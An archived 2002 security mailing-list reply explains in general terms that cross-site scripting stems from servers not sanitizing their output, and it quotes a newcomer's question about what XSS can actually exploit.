Re: XSS Questions

From: Martin Wasson (martin_wassonat_private)
Date: Tue Dec 10 2002 - 10:24:40 PST

Next message: Brass, Phil (ISS Atlanta): "RE: Firewall Load Testing"

Previous message: Stephen Friedl: "Re: remote MAC address discovery?"
Maybe in reply to: John Madden: "XSS Questions"
Next in thread: Mr. The Brain: "Re: XSS Questions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

John,
The vulnerability is in that the server does not sanitize data it sends to
the client. Sanitizing input not withstanding, a server must sanitize it's
output to avoid this lawlessness. Otherwise an eville haxor can get your
site to send your customer a link to his site, wherein your customer's box
can unwittingly execute malicious code, and BOOM !! therefore divulge lots
of sensetive data., e.g. username, password, SSN, home address, etc. Get
it? BOOM !!....John Madden..... I kill me. So accepting user input
doesn't matter in this situation...it's the ouput, bro.

Marty Wasson
Web Security Admin
Mastercard International
martin_wassonat_private

John Madden
<chiwawa999@yahoo To: pen-testat_private
.com> cc: (bcc: Martin Wasson/STL/MASTERCARD)
Subject: XSS Questions
12/07/02 08:36 AM

Hello all,

Being new to XSS and seing alot of messages in the
last couple weeks on the subject got me wondering...

What is the real vulnerability if the site in
questions is vulnerable to XSS but does not let you
write any malicious scripts on the system, like
message board, forums etc... ? Can anything be done to
exploit XSS if the above scenario occurs ? I know it
depends on the web server, packages installed etc...
I'm asking in generaly is it possible ?

Great you can do the document.cookie and view your
cookie, that migth give a hint on the structure but...
or redirect yourself to another web site :) etc...

I've read the document on XSS by David Endler
http://www.idefense.com/papers.html but still have
some questions.

If possible, can the XSS guru's on the list shed some
light on the subject.

Thanks for your time,

Cheers

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com

----------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Brass, Phil (ISS Atlanta): "RE: Firewall Load Testing"
Previous message: Stephen Friedl: "Re: remote MAC address discovery?"
Maybe in reply to: John Madden: "XSS Questions"
Next in thread: Mr. The Brain: "Re: XSS Questions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 10 2002 - 13:26:26 PST